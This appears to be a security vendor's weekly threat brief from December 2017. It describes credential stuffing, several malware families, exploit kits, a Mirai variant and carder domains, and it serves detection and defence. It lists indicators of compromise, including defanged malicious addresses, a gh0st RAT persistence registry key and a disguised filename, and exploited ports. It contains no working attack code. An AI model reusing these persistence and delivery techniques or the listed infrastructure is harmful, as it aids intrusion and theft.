Activity Summary – Week Ending December 15, 2017

Cybercriminals are always looking for the easy route to exploit their targets. And why try too hard anyway when poor security hygiene and weak password management make it nearly effortless for them to accomplish their nefarious deeds.

Credential theft provides that easier method of gaining access to systems. And what do you do when you have a large pile of usernames and passwords? Simply use a method of attack known as credential stuffing. Credential stuffing is an account take-over cyberattack where stolen account credentials are used to access your accounts through automated login requests. Criminals can use botnets to try various combinations of these stolen credentials to potentially gain unauthorized access to other systems, such as banks and sensitive systems. The botnets simply take a large list of credentials and test them to see if they can be used to break in. Credential stuffing cyberattacks work because people tend to use the same passwords for their corporate network access as they do for social forums and other internet accounts, including financial institutions.

In early December of this year, 1.4 billion username and password combinations were found on the darknet. These account credentials were stored in a single repository, in cleartext, and were mostly valid for Bitcoin, Pastebin, LinkedIn, MySpace, and other social forums. This was a wealth of information available for compromise.

Fortinet’s Credential Stuffing Defense identifies login attempts using credentials that have been compromised using an always up-to-date feed of stolen credentials. Administrators can configure their supported devices to take various actions if a suspicious login is used, including logging, alerting, and blocking. The FortiGuard Credential Stuffing Defense is available for use with FortiWeb Web Application Firewall solutions.,

Malware Activity

A RansomWeb is weaved! – There is a new type of ransomware called File Spider that has recently been detected in the southeast European region. As is the case with most ransomware, it is distributed through malicious Word document attachments, and may be delivered through targeted or general spam types of email. The note describes a requirement for taking action in regards to debt collection. The current email delivery vehicle appears to be written in a variety of regional languages and has been detected in countries such as Croatia, Herzegovina, Bosnia, and Serbia. The email subject is debt collection, and once the user enables editing, the document is opened and the malicious macro detonation cycle begins.

The macro contains an encoded PowerShell script that downloads other encrypted files from a remote site. The files are saved in a folder containing the name Spider. PowerShell then executes the necessary files to encrypt specified files within the target system computer using AES-128 bit encryption. In each folder that a file is encrypted, a ransom note is provided called ‘HowtoDecryptFiles.url. When this is clicked a convenient video tutorial opens from the site, describing how to make Bitcoin payment for restoration of the infected computer. Two of the files being downloaded are detected by Fortinet signaures:W32/Generic!tr and MSIL/Filecoder.J!tr. The known URLs are categorized in our Web Filtering database as malicious.

Ursnif Docks in Japan – Just making the top 5 malware list for the week with over 4,500 sensors triggering, is a variant dropping the Ursnif banking trojan. The signatureVBA/Agent.FRG!tr.dldr was mostly seen targeting our Japanese customers followed by US and South Korea. The variant first appeared December 6th, 2017 and was embedded in a Microsoft Excel document which contained a malicious macro downloading banking Trojan using Powershell. The threat has been around for a while and was one of the most active banking Trojans last year, containing malicious actions such as keylogging and credential harvesting along with various evasion techniques using the Tor network and sandbox evasions. It’s worth noting that banks are not the only target these days. Once the source code was leaked other criminal groups started targeting other industries.

Mining for Cryptocurrency – We have seen an uptick in drive-by cryptomining malware and operations. While the signature W32/Bitcoinminer.BAD!tr did not hit our top 5, it has been triggering more over the last few weeks. If you are not aware, cryptocurrency is maintained on a ledger in cyberspace, and is maintained in a crowd-sourced fashion. Individuals participate in assisting to complete transactions, and are rewarded with slivers of the digital currency basic units (such as a coin). The operation to complete transactions for payment is known as cryptomining, and typically requires a lot of computing resources to support it. The average home computer system is insufficient for generating a large number of the required transactions to make it a profitable venture. Electricity is the main problem, as is the power of the single machine’s CPU. If a large number of computers can be linked together and used to do the mining then there is certainly money to be made. Cyber criminals are aware of this, attacking single systems in an effort to ‘daisy chain’ computing resources. This creates more ‘crunch’ power and efficiency in the operation with little or no overhead costs.

There are a few approaches to doing this. The first is an attack that takes over a computer and connects it to a larger botnet of similarly infected computers which are then used to perform cryptocurrency transactions. The second method is to use a website to lure in potential victims. Active content and browser plug-ins are used to hijack machines and use their resources for cryptomining. The hijacked machines can unknowingly belong to people visiting the site or even the web servers that provide content to users. Unscrupulous web site owners can even intentionally create this capability with site visitors unaware of what is happening. If hundreds or even thousands of sites are used, with hundreds or thousands of users at each site, cyber criminals can reap huge rewards leveraging all the resource power.

Simply leaving the site may not stop the mining operation. Criminals are using advanced techniques, such as hiding another browser session behind the operating system taskbar to continue mining after the user closes the browser session. It remains open but hidden and continues to churn out transactions for the cryptominer.

Application Vulnerabilities / IPS

Neutrino EK Still Alive – We were surprised to see the Neutrino exploit kit (EK) make our first spot this week among top exploit kits. Similar to all other EK’s, Neutrino is an easy to use tool for the non-technical person to automate the exploitation of client-side vulnerabilities, such as browser plug-ins and the browser itself. Neutrino first appeared in 2013, but it wasn’t until last year when the EK took over the top spot for exploit kits that drop ransomware. However, as quickly as it rose to the top, its activity dropped off significantly the latter half of 2016. A large part of that was due to a global malvertising campaign being shut down. The EK still continues to hover around our top 10 EKs throughout the year, fortunately not showing the same strong numbers as last year.

A Gh0st Still Haunting – First detected in 2008, we are seeing an uptick in FortiGuard detections for a variant of the gh0st-RAT (Remote Access Trojan) in recent weeks. Fortinet customers remain protected by W32/Agent.TCG!tr despite the trojan executable being repackaged to thwart basic file checksum matching. Arriving as a fake wextract cab-file self-extractor or just a self-extracting zip it requires the user to initiate. Once launched the trojan will create a folder “%systemroot%\\xxxxxx579e5a5b vvvvvvrr2unw==” and copy itself there using the filename svchsot.exe. The following run key is also created for persistence: “hklm\\software\\microsoft\\windows\\currentversion\\runxxxxxx579e5a5b vvvvvvrr2unw==%systemroot%\\xxxxxx579e5a5b vvvvvvrr2unw==”

Once established, the trojan will attempt to contact its C&Cs firstly by looking up several domains and then connecting when an IP address is resolved.


One of the primary functions of the RAT is to gather keystrokes, which it stores in the same folder as the executables, where the filename is the middle sequence from the folder’s name (.key – in this case 579e5a5b.key). This file can be observed to grow as the user interacts with the infected system.

Rise Mirai Rise! – FortiGuard Labs has recently released a new signature to detect a botnet, and it looks suspiciously like another Mirai variant. This particular one attacks Huawei network gear, and is aimed at creating botnets. The signature basically stops the expected remote code execution. It is interesting that the Mirai malware platform continues to be used for integrating various other malware packages and attack vectors. This particular variant attacks ports 37215 and 52869, but Fortinet’s engineers successfully detected and reverse engineered the malware. Our in-depth analysis discovered that Huawei devices were one of the target platforms and ultimately led to the creation of this critical signature.

To thwart this attack, we have three signatures currently available to Fortinet customers. Attack on port 52869 is covered by D-Link.Realtek.SDK.Miniigd.UPnP.SOAP.Command.Execution, while the attack on port 37215 is covered byHuawei.HG532.Remote.Code.Execution. The other is an anti-malware signature (Linux/Mirai.Y!tr.bdr) to detect the malicious files. For more information, see below in the Threat Research and Insights section of this brief.

Web Filtering

Carder Not Welcome – FortiGaurd Labs has recently discovered 75 domains being used as carder domains. Carding is a term used to describe trafficking of stolen credit cards, banking credentials and any type of personally identifiable information. Carder domains allow you to buy and sell the stolen information. The email registrant for the domains arevermon4433[@]mail[.]ru and optbaseop[@]mail[.]ru. Both the domains and the registrant emails have been blacklisted.

Another Cryin’ Threat – Sambacry is a critical remote code execution vulnerability in the open-source software ( usually found on Linux systems. It provides the ability for non-Windows systems to share files through Windows file sharing protocols (SMB). This vulnerability is being used to infect NAS systems with StorageCrypt Ransomware. As with most ransomware threats, once loaded the files are encrypted and a ransom note demands a Bitcoin payment in exchange for decrypting the victim’s files. The URL associated in the incident is 45[.]76[.]102[.]45/sambacry which is blacklisted and the anti-malware signature Linux/EncPk.BE can detect the payload.

Threat Research & Insights

Rising of a Mirai Variant – FortiGaurd labs has some in-depth technical analysis of a new variant of the Mirai botnet, named Okiru, that has been observed in the wild this past week.  [Read More..]

Bitcoin RATS – Kadena Threat Intelligence System, an in-house developed tool discovered a spam campaign targeting Bitcoin investors and dropping the Orcus RAT as payload. [Read More..]

Are you smarter than a Smart Device? – 70 participants wanted to find out if they could outsmart a smart device at the first edition of a CTF dedicated to smart devices called Ph0wn. [Read More..]


News Courtesy :